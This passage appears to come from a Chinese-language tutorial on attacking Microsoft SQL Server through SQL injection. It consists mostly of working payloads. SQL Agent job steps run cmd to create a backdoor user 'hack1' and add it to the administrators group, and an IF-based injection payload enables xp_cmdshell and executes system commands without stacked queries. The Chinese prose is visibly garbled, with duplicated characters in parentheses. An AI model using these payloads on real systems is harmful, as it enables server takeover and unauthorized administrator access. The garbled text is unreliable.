exec sp_add_jobstep null,'x',null,'1','cmdexec','cmd /c "net user hack1 hack1 /add &net localgroup administrators hack1 /add>c:/job.txt"'
exec sp_add_jobserver null,'x',@@servername
exec sp_start_job 'x';

3、再查看用戶發(fā)現(xiàn)hack1用戶存在且已經(jīng)在管理員組里面

無(wú)法堆疊的情況下執(zhí)行系統(tǒng)命令

https://blog.51cto.com/u_15127627/4024124

那么 exec 真的需要多句才能執(zhí)行嗎？，來直接看 payload 吧

if 語(yǔ)句的表達(dá)式如下，也就是說，我們是可以借助 if 來執(zhí)行 sql_statement，那么只要你能在你的注入點(diǎn)構(gòu)造一個(gè) if 出來，不需要環(huán)境支持堆疊也可以達(dá)到堆疊的效果。

IF Boolean_expression   
     { sql_statement | statement_block }   
[ ELSE   
     { sql_statement | statement_block } ]

完整的 payload

select 1 where 1=1 if 1=1 execute('exec sp_configure ''show advanced options'', 
1;reconfigure;exec sp_configure ''xp_cmdshell'', 1;reconfigure;exec xp_cmdshell 
''whoami''');

審核編輯：劉清